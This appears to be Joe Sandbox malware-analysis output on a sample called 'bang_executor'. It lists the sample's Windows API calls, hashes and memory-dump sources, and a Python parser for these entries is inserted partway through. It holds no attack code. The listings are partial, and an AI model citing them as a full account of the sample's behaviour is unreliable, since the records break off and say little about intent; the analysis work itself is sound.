                                        Similarity
                                        • API ID: File$BuffersFlushTime
                                        • String ID:
                                        • API String ID: 1392018926-0
                                        • Opcode ID: e81f249f2938f722a9cca8ba1cdaa24f9ce61b4cb77d6652cc4b8f3ae3b7e3b2
                                        • Instruction ID: 239e17d1e01030b6f06da74b536c40bf8917fcfb397a6a0de7c347e50e2e625e
                                        • Opcode Fuzzy Hash: e81f249f2938f722a9cca8ba1cdaa24f9ce61b4cb77d6652cc4b8f3ae3b7e3b2
                                        • Instruction Fuzzy Hash: F421DF312482859BC714EE26C491ABBBBE8BF55306F08491EF48187381D32DD90CD7A6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: H_prolog3_wcslen
                                        • String ID:
                                        • API String ID: 3746244732-0
                                        • Opcode ID: d9147fbcbd9d49a42f6c9c9e63224d3d955eb969157f084fe0252baa3e405204
                                        • Instruction ID: f41a86593372ae38fa9d8460fe19f879f1f835fc866028043408db885a494efe
                                        • Opcode Fuzzy Hash: d9147fbcbd9d49a42f6c9c9e63224d3d955eb969157f084fe0252baa3e405204
                                        • Instruction Fuzzy Hash: EB21AC3590024A9FCF11EF96C885AEEBBB6BF48304F10042EF545A72E2C7795A51CF68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • FreeLibrary.KERNEL32(00000000,00000001,005460C8,?,?,?,00506386,00000004,InitializeCriticalSectionEx,00519624,InitializeCriticalSectionEx,00000000,?,0050613D,005460C8,00000FA0), ref: 00506215
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0050621F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AddressFreeLibraryProc
                                        • String ID:
                                        • API String ID: 3013587201-0
                                        • Opcode ID: eb9d30748c36622d55b1875742e5a97731f0a18ca99a194a579f9a966d302fc6
                                        • Instruction ID: 743c1c85710a39fdcb2e9de785c0aaf5d751ddd8c84c3c60ef41927eecef3a2f
                                        • Opcode Fuzzy Hash: eb9d30748c36622d55b1875742e5a97731f0a18ca99a194a579f9a966d302fc6
                                        • Instruction Fuzzy Hash: 1C11D0396001169FDF22CFA4DC8099E7BA5FF563607240169E916EB291E730ED21DB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 004EE208: _wcslen.LIBCMT ref: 004EE210
                                          • Part of subcall function 004F418A: _wcslen.LIBCMT ref: 004F4192
                                          • Part of subcall function 004F418A: _wcslen.LIBCMT ref: 004F41A3
                                          • Part of subcall function 004F418A: _wcslen.LIBCMT ref: 004F41B3
                                          • Part of subcall function 004F418A: _wcslen.LIBCMT ref: 004F41C1
                                          • Part of subcall function 004F418A: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,004ED2D3,?,?,00000000,?,?,?), ref: 004F41DC
                                          • Part of subcall function 004FCBB6: SetCurrentDirectoryW.KERNELBASE(?), ref: 004FCBBA
                                        • _wcslen.LIBCMT ref: 004FCFF1
                                        • SHFileOperationW.SHELL32(?), ref: 004FD033
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _wcslen$CompareCurrentDirectoryFileOperationString
                                        • String ID:
                                        • API String ID: 1016385243-0
                                        • Opcode ID: cc7e6480c98f8b9063c9a0af0096405d304e5b42680d8829c4153add76629a23
                                        • Instruction ID: 6b46bd87d7daa977deae5c32895cbcbbc0bfd89156347747f94d15eca55ba2fb
                                        • Opcode Fuzzy Hash: cc7e6480c98f8b9063c9a0af0096405d304e5b42680d8829c4153add76629a23
                                        • Instruction Fuzzy Hash: 8B11B27190021D6ADB24AFA4DC4EBEE77ACFF58344F14082AF605D71C1EBB896488B05
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 004EB907
                                        • GetLastError.KERNEL32 ref: 004EB914
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastPointer
                                        • String ID:
                                        • API String ID: 2976181284-0
                                        • Opcode ID: 44f12190099512abf143b14a19d302239ad3004583fa524e59626ea5aedebaf9
                                        • Instruction ID: f457b6f330a37ed363275d9d2e596a2ae51f08a38f3fca3248b04df7d6411075
                                        • Opcode Fuzzy Hash: 44f12190099512abf143b14a19d302239ad3004583fa524e59626ea5aedebaf9
                                        • Instruction Fuzzy Hash: 93110270A00740ABD724972ACC847A773E8FB45372F60462AE252932D1E378EC05D794
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _free.LIBCMT ref: 0050BB55
                                          • Part of subcall function 0050BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00506A24,?,0000015D,?,?,?,?,00507F00,000000FF,00000000,?,?), ref: 0050BCC0
                                        • HeapReAlloc.KERNEL32(00000000,?,?,?,?,005250C4,004E190A,?,?,00000007,?,?,?,004E1476,?,00000000), ref: 0050BB91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Heap$AllocAllocate_free
                                        • String ID:
                                        • API String ID: 2447670028-0
                                        • Opcode ID: f057022c4b62a4fb5c4149dfc55bc3c37c571126656bab8b576b42c31e59840f
                                        • Instruction ID: 0de1dd702c30e5d7b4428420dc979f056fdd85103cddf364ef8e1f193930b31a
                                        • Opcode Fuzzy Hash: f057022c4b62a4fb5c4149dfc55bc3c37c571126656bab8b576b42c31e59840f
                                        • Instruction Fuzzy Hash: 67F0F631600207A7FB212A66ACC5FAF3F58FFC2B70B204126F815961E5DF34CC0191A9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • SetFileAttributesW.KERNELBASE(?,00000000,?,00000001,?,004EBF5E,?,?), ref: 004EC305
                                          • Part of subcall function 004EDA1E: _wcslen.LIBCMT ref: 004EDA59
                                        • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,004EBF5E,?,?), ref: 004EC334
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AttributesFile$_wcslen
                                        • String ID:
                                        • API String ID: 2673547680-0
                                        • Opcode ID: 57d1219e03f909ad58ff9ea3141e124c216d3354b0594c5998be55d74620b01d
                                        • Instruction ID: f76004d00dfbcfd0c90016a8e1b7fe39f2f9cb637bb920f616ae84e28536fa17
                                        • Opcode Fuzzy Hash: 57d1219e03f909ad58ff9ea3141e124c216d3354b0594c5998be55d74620b01d
                                        • Instruction Fuzzy Hash: 57F0F034200219ABDB00AF328C05AEF77ACFF0C305F40809AB901D7290DB34DE499BA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • DeleteFileW.KERNELBASE(?,?,?,?,004EB14B,?,00000000,004EAF6E,08ADEBCE,00000000,0051517A,000000FF,?,004E8882,?,?), ref: 004EBC82
                                          • Part of subcall function 004EDA1E: _wcslen.LIBCMT ref: 004EDA59
                                        • DeleteFileW.KERNEL32(?,?,?,00000800,?,004EB14B,?,00000000,004EAF6E,08ADEBCE,00000000,0051517A,000000FF,?,004E8882,?), ref: 004EBCAE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: DeleteFile$_wcslen
                                        • String ID:
                                        • API String ID: 2643169976-0
                                        • Opcode ID: 48765689010a3c7d7224015917a498a8c0471b2bdf856d22a1d1fcb14b31043d
                                        • Instruction ID: 0213155fba6527a739e9206f6ed2389e2628ea16f1e8b36776059167fca7166e
                                        • Opcode Fuzzy Hash: 48765689010a3c7d7224015917a498a8c0471b2bdf856d22a1d1fcb14b31043d
                                        • Instruction Fuzzy Hash: 0CF0BE35601229ABDB00DF619C45EEF77ACEF0D305F44406ABA01D3280DF74EE889BA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _swprintf.LIBCMT ref: 00500341
                                          • Part of subcall function 004E4C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004E4C13
                                        • SetDlgItemTextW.USER32(00000065,?), ref: 00500358
                                          • Part of subcall function 004FD864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004FD875
                                          • Part of subcall function 004FD864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004FD886
                                          • Part of subcall function 004FD864: IsDialogMessageW.USER32(0001045C,?), ref: 004FD89A
                                          • Part of subcall function 004FD864: TranslateMessage.USER32(?), ref: 004FD8A8
                                          • Part of subcall function 004FD864: DispatchMessageW.USER32(?), ref: 004FD8B2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                        • String ID:
                                        • API String ID: 2718869927-0
                                        • Opcode ID: aad4e8a0b43cb0a627b6cf3d57ef85305d8a4ea728db535f1ae4bfbd43c8d3e9
                                        • Instruction ID: f2e7dc47da5da70ae9ff53c9018d7defebe31860cde013c47d255f7d62cb2031
                                        • Opcode Fuzzy Hash: aad4e8a0b43cb0a627b6cf3d57ef85305d8a4ea728db535f1ae4bfbd43c8d3e9
                                        • Instruction Fuzzy Hash: 08F0BB7150020C6BDB11FB6ADC0AEEF7BAC9F0D309F040456B20197193D6749A059BA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,?,?,?,004EBCD4,?,004E8607,?), ref: 004EBCFA
                                          • Part of subcall function 004EDA1E: _wcslen.LIBCMT ref: 004EDA59
                                        • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,?,004EBCD4,?,004E8607,?), ref: 004EBD24
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AttributesFile$_wcslen
                                        • String ID:
                                        • API String ID: 2673547680-0
                                        • Opcode ID: 4840ab12286d33263f4e21cd6b7de4d09dec521c5f2b159b1e7efefd4e9ac74e
                                        • Instruction ID: d6e7a8e92aa2014c5d6a11ea5ed186467e85cce70ddc37c41c85a0266def2a84
                                        • Opcode Fuzzy Hash: 4840ab12286d33263f4e21cd6b7de4d09dec521c5f2b159b1e7efefd4e9ac74e
                                        • Instruction Fuzzy Hash: 7EF0B4316002585BD710EB799D099EFB7BCEB4D761F000165FA41E3280DB749E45DA99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,?,00000002,00000002,?,004F31C7,004ED526), ref: 004F3191
                                        • GetProcessAffinityMask.KERNEL32(00000000,?,004F31C7), ref: 004F3198
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Process$AffinityCurrentMask
                                        • String ID:
                                        • API String ID: 1231390398-0
                                        • Opcode ID: 8e39744f55d44cdf1895d88494fac9170180b91cd9e11f87f510eb38bea323af
                                        • Instruction ID: 3835307cf0f539e64cfc0a49ff19ee2125e5eaaa2bb241588c11b84e4e7a9bc5
                                        • Opcode Fuzzy Hash: 8e39744f55d44cdf1895d88494fac9170180b91cd9e11f87f510eb38bea323af
                                        • Instruction Fuzzy Hash: 0BE0D832B00109679F098FA49D098FB73DDDA5924631481BAA603D3300FA38DE0946A8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004F28D4
                                        • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004F1309,Crypt32.dll,00000000,004F1383,00000200,?,004F1366,00000000,00000000,?), ref: 004F28F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystem
                                        • String ID:
                                        • API String ID: 1175261203-0
                                        • Opcode ID: ca03e40f1c47517b0abeb997c302188547d9ca1e33fd01c827f91ba73626be86
                                        • Instruction ID: e1763fb9d677b537213cb5b0bf1b9e2358fa615da57cc2c3802997d86d56fc24
                                        • Opcode Fuzzy Hash: ca03e40f1c47517b0abeb997c302188547d9ca1e33fd01c827f91ba73626be86
                                        • Instruction Fuzzy Hash: D4F0E935900108ABCB10DF65CD09DDFB7FCEF4D741F00006AB605D3140CA74EA498B68
                                        Uniqueness

                                        Uniqueness Score: -1.00%
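The "APIs" entries in these function records share one fixed shape: API name, module, the argument list as recovered at the call site (with `?` for unresolved values), and the address of the call after `ref:`. CRT-internal entries such as `___vcrt_FlsSetValue.LIBVCRUNTIME` carry no argument list, and nested calls are prefixed with "Part of subcall function". The parser below is an added example for working with this listing offline; it is not part of the Joe Sandbox report or its tooling. The sample text is a handful of entries copied from the records on this page, and the `ApiCall` type and the `library_loads` and `calls_by_module` helpers are the example's own names.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# One "APIs" line as rendered in the report:
#   • <Api>.<MODULE>(<arg>,<arg>,...), ref: <ADDR>
# CRT-internal entries carry no argument list:
#   • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005051CA
ENTRY_RE = re.compile(
    r"^\s*•\s*(?P<api>[A-Za-z_][\w@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Nested entries: "• Part of subcall function 004E6AE8: <entry>"
SUBCALL_RE = re.compile(
    r"^\s*•\s*Part of subcall function (?P<func>[0-9A-Fa-f]{8}):\s*(?P<rest>.+)$"
)


@dataclass
class ApiCall:
    api: str                          # e.g. "LoadLibraryW"
    module: str                       # e.g. "KERNELBASE"
    args: List[str]                   # raw argument tokens; "?" means unresolved
    ref: int                          # address of the call site
    subcall_of: Optional[int] = None  # enclosing function for nested entries


def parse_api_entries(text: str) -> List[ApiCall]:
    """Parse every API entry in a chunk of report text; other lines are skipped."""
    calls: List[ApiCall] = []
    for raw in text.splitlines():
        line = raw.strip()
        subcall = None
        sub = SUBCALL_RE.match(line)
        if sub:
            subcall = int(sub.group("func"), 16)
            line = "• " + sub.group("rest")
        m = ENTRY_RE.match(line)
        if not m:
            continue
        args_text = m.group("args")
        args = [a.strip() for a in args_text.split(",")] if args_text else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), subcall))
    return calls


def library_loads(calls: List[ApiCall]) -> List[str]:
    """DLL names visible in the arguments of LoadLibrary* calls."""
    names: List[str] = []
    for c in calls:
        if c.api.startswith("LoadLibrary"):
            names.extend(a for a in c.args if a.lower().endswith(".dll"))
    return names


def calls_by_module(calls: List[ApiCall]) -> Dict[str, int]:
    """Entries per module, for a quick import-profile comparison between samples."""
    counts: Dict[str, int] = {}
    for c in calls:
        counts[c.module] = counts.get(c.module, 0) + 1
    return counts


# Constructed sample: entries copied from the function records on this page.
SAMPLE = """\
APIs
• GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004F28D4
• LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004F1309,Crypt32.dll,00000000,004F1383,00000200,?,004F1366,00000000,00000000,?), ref: 004F28F4
• GetProcAddress.KERNEL32(00000000,?), ref: 0050D348
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005051CA
• __EH_prolog3.LIBCMT ref: 004E1483
  • Part of subcall function 004E6AE8: __EH_prolog3.LIBCMT ref: 004E6AEF
"""

if __name__ == "__main__":
    parsed = parse_api_entries(SAMPLE)
    for c in parsed:
        print(f"{c.ref:08X} {c.module}!{c.api} args={len(c.args)} subcall_of={c.subcall_of}")
    print("DLLs loaded by name:", library_loads(parsed))
    print("entries per module:", calls_by_module(parsed))
```

The bullet character is part of the rendered text and the parser keys on it, so paste entries as they appear on the page. The `GetSystemDirectoryW` followed by `LoadLibraryW` with `Crypt32.dll` in the argument list is the pattern `library_loads` surfaces: a DLL resolved from the system directory before loading, which is the behaviour to confirm against the call-site addresses when triaging the binary.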

                                        APIs
                                        • GdiplusShutdown.GDIPLUS(?,?,?,?,0051505D,000000FF), ref: 004FCD7D
                                        • OleUninitialize.OLE32(?,?,?,?,0051505D,000000FF), ref: 004FCD82
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: GdiplusShutdownUninitialize
                                        • String ID:
                                        • API String ID: 3856339756-0
                                        • Opcode ID: d0b0571ea50107ed80eeabff7e586d530cd52c06022b00e96c3ec9e1d1fa0c39
                                        • Instruction ID: c554f4f6e46dcc276918d728f8de8114e73a63e6acbd6032356d23f77056fbe1
                                        • Opcode Fuzzy Hash: d0b0571ea50107ed80eeabff7e586d530cd52c06022b00e96c3ec9e1d1fa0c39
                                        • Instruction Fuzzy Hash: 21F08976604544EFD710DF55DC05F5AFBB8FB5D720F00426AE415C3760DB34A905CA94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 004FC36E
                                        • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 004FC375
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
